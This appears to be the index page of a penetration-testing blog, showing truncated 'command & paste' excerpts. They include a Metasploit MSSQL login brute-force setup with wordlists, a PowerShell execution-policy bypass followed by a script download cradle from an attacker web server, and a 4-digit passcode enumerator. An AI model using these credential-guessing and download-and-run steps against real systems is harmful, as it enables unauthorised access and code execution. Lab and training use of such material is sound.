Home
Cyber Security Sanctorum
Cancel

metasploit mssql command & paste

#msfconsole -q msf> use auxiliary/scanner/mssql/mssql_login msf> set RHOSTS 10.10.10.50 msf> set USER_FILE /root/Desktop/wordlist/list_of_users.txt msf> set PASS_FILE /root/Desktop/wor...

kali command & paste

The id command displays the identity of the user running the session along with the list of groups they belong to $ id uid=1000(kali) gid=1000(kali) groups=1000(kali),27(sudo) The uname -a comman...

kali update command & paste

To update Kali, first ensure that /etc/apt/sources.list is properly populated: # See https://www.kali.org/docs/general-use/kali-linux-sources-list-repositories/ deb http://http.kali.org/kali kali-...

wget command & paste

#wget http://10.10.10.50/

curl command & paste

#curl http://10.10.10.50/

power shell command & paste

Allow scripts to run within the scope of this PowerShell process: Set-ExecutionPolicy Bypass -Scope Process Download a script from a webserver (eg. python3 -m http.server 8181): (New-Object Net....

cracking password w/python

This is a python program that prints out all possible products, or permutations, of 4-digit passcodes: from string import digits from itertools import product for passcode in product(digits, repe...